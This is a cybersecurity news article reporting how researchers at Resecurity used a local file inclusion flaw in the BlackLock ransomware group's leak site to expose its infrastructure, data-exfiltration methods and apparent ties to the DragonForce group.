In a remarkable incident of hackers being hacked, threat hunters have successfully infiltrated the online infrastructure of the BlackLock ransomware group, exposing crucial information about their operational methods.
According to Resecurity, a security vulnerability was discovered in the data leak site (DLS) operated by the cybercrime group, allowing for the extraction of configuration files, credentials, and command execution history on the server.
The vulnerability is attributed to a misconfiguration in the BlackLock Ransomware DLS, which led to the disclosure of clearnet IP addresses related to their network infrastructure behind TOR hidden services, as well as additional service information, as stated by the company in a report.
The obtained command execution history is considered one of the most significant operational security (OPSEC) failures of the BlackLock ransomware group.
BlackLock is a rebranded version of the Eldorado ransomware group and has become one of the most active extortion syndicates in 2025, primarily targeting the technology, manufacturing, construction, finance, and retail sectors. As of last month, they have listed 46 victims on their site.
The affected organizations are located in various countries, including Argentina, Aruba, Brazil, Canada, Congo, Croatia, Peru, France, Italy, the Netherlands, Spain, the United Arab Emirates, the United Kingdom, and the United States.
The group, which launched an underground affiliate network in mid-January 2025, has been observed recruiting traffers to facilitate the early stages of attacks by directing victims to malicious pages that deploy malware capable of establishing initial access to compromised systems.
The vulnerability identified by Resecurity is a local file inclusion (LFI) bug, which essentially tricks the web server into leaking sensitive information by performing a path traversal attack, including the command execution history.
Some notable findings from the investigation are:
- The use of Rclone to exfiltrate data to the MEGA cloud storage service, in some cases even installing the MEGA client directly on victim systems.
- The creation of at least eight accounts on MEGA using disposable email addresses created via YOPmail to store victim data.
- A reverse engineering of the ransomware has uncovered source code and ransom note similarities with another ransomware strain codenamed DragonForce, which has targeted organizations in Saudi Arabia.
- “$$$”, one of the main operators of BlackLock, launched a short-lived ransomware project called Mamona on March 11, 2025.
In a surprising turn of events, BlackLock’s DLS was defaced by DragonForce on March 20, likely by exploiting the same LFI vulnerability, with configuration files and internal chats leaked on its landing page.
Resecurity noted that it is unclear if BlackLock Ransomware started cooperating with DragonForce or silently transitioned under new ownership, suggesting that the new masters may have taken over the project and its affiliate base due to ransomware market consolidation.
The key actor ‘$$$’ did not express surprise after the incidents with BlackLock and Mamona Ransomware, leading to speculation that the actor may have been aware of the potential compromise and chose to exit the project silently.
